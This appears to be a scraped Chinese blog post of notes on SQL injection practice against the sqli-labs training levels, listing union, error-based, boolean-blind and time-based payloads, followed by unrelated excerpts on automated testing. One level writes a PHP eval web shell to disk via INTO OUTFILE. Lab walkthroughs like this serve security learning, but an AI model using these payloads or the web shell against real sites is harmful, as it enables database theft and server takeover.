滲透測試 SQL自動化注入

2022-09-09 14:12:23 字數 3896 閱讀 9555

自動化注入

半自動化

burp

全自動sqlmap

定製化指令碼

sqli-labs題庫

less-01

字元型注入

單引號

?id=1

?id=1' and 1=2 union select 1,version(),3 --+

less-02

數字型注入

?id=-2 union select 1,2,version()

less-03

字元型注入

near ''1'') limit 0,1' at line 1

')

?id=1') and 1=2 union select 1,2,version()--+

less-04

字元型注入

")

?id=2") and 1=2 union select 1,2,version()--+

less-05

沒有回顯,有報錯

字元型注入

單引號

?id=3' and updatexml(1,concat(0x5e,version(),0x5e),1)--+

less-06

沒有回顯,有報錯

字元型注入

"

?id=1" and updatexml(1,concat(0x5e,(select version()),0x5e),1)--+

less-07

沒有回顯,沒有報錯

經過**審計

字元型注入

'))

?id=2')) union select 1,"<?php @eval(\$_request[777])?>",3 into outfile "c:\\phpstudy\\www\\1.php"--+

less-08

沒有回顯,沒有報錯,有布林型別狀態

字元型注入

'

布林盲注

半自動化注入

工具:bp

*得到資料庫名長度

?id=2' and length(database())=2 --+

抓包

選擇字典

得到資料庫名的長度 8

*獲取資料庫名

字典第乙個變數1-8

第二個變數1-128

字元型注入,單引號

沒有回顯,沒有報錯,沒有布林型別狀態,有延時

半自動化注入

*獲取資料庫長度

?id=1' and if(length(database())=1,sleep(5),1)--+

抓包

新增變數

字典 0-9

*獲取資料庫名

抓包

字典

變數1:1-8

變數2:1-128

獲取成功

python自動化滲透

從zoomeye到bugscan,再到tangscan,大型的poc exp平台越來越多,各種掃瞄器也層出不窮。web安全的門檻越來越高,自動化的滲透已經成了一種趨勢。我一直夢想著,將來滲透的時候,先開啟自己寫的各種自動化工具,輸入目標,然後喝著咖啡,刷著知乎,最後只需要把工具的分析報告整理整理就可...

自動化測試 web自動化測試

自動化 由機器裝置代替人為完成制定目標的過程 優點 提高工作效率 減少勞動力 產品規格同一標準 批量生產 自動化測試 讓程式代替人為去驗證程式功能的過程,即在預設條件下執行程式系統 流程確定 搭建自動化框架 編寫測試用例,將其轉化為soupui 介面 自動化測試指令碼 執行自動化測試指令碼 輸出執行...

測試自動化 自動化測試的定義

相關術語 automated testing test tool,automated testing test suite,automated testing test script等.具體參見 http en.wikipedia.org wiki test automation 推薦書籍 1 軟體...